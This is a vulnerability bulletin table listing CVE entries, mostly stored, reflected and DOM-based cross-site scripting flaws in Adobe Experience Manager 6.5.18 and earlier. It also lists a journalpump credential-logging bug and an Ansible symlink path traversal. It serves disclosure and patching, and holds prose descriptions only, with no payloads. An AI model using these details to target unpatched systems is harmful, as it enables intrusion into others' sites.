adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48542 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48543 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48544 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48545 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48546 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48547 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48548 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48549 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48550 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48551 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48552 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48553 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48554 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48555 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48556 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48557 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48558 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48559 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48560 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48561 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48562 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48563 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48564 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48565 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48566 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48567 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48568 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48569 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48570 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48571 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48572 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48573 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48574 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48575 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48576 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48577 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48578 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48579 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48580 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48581 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48582 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48583 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48584 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48585 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48586 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48587 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48588 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48589 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48590 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48591 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48592 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48593 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48594 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48595 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48596 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48597 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48598 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48599 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48600 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48601 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48602 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48603 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48604 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48605 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48606 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48607 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48609 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48610 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48611 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48612 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48613 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48614 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48615 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48616 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48617 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48618 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48619 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48620 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48621 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48622 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48623 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48624 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-20 | 5.4 | CVE-2023-51457 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-20 | 5.4 | CVE-2023-51458 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-20 | 5.4 | CVE-2023-51459 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-20 | 5.4 | CVE-2023-51460 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-20 | 5.4 | CVE-2023-51461 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-20 | 5.4 | CVE-2023-51462 psirt@adobe.com |
aiven-open -- journalpump | journalpump is a daemon that takes log messages from journald and pumps them to a given output. A logging vulnerability was found in journalpump which logs out the configuration of a service integration in plaintext to the supplied logging pipeline, including credential information contained in the configuration if any. The problem has been patched in journalpump 2.5.0. | 2023-12-21 | 6.5 | CVE-2023-51390 security-advisories@github.com security-advisories@github.com |
ansible -- ansible | An absolute path traversal attack exists in the Ansible automation platform. This flaw allows an attacker to craft a malicious Ansible role and make the victim execute the role. A symlink can be used to overwrite a file outside of the extraction path. | 2023-12-18 | 6.3 | CVE-2023-5115 secalert@redhat.com secalert@redhat.com secalert@redhat.com secalert@redhat.com |
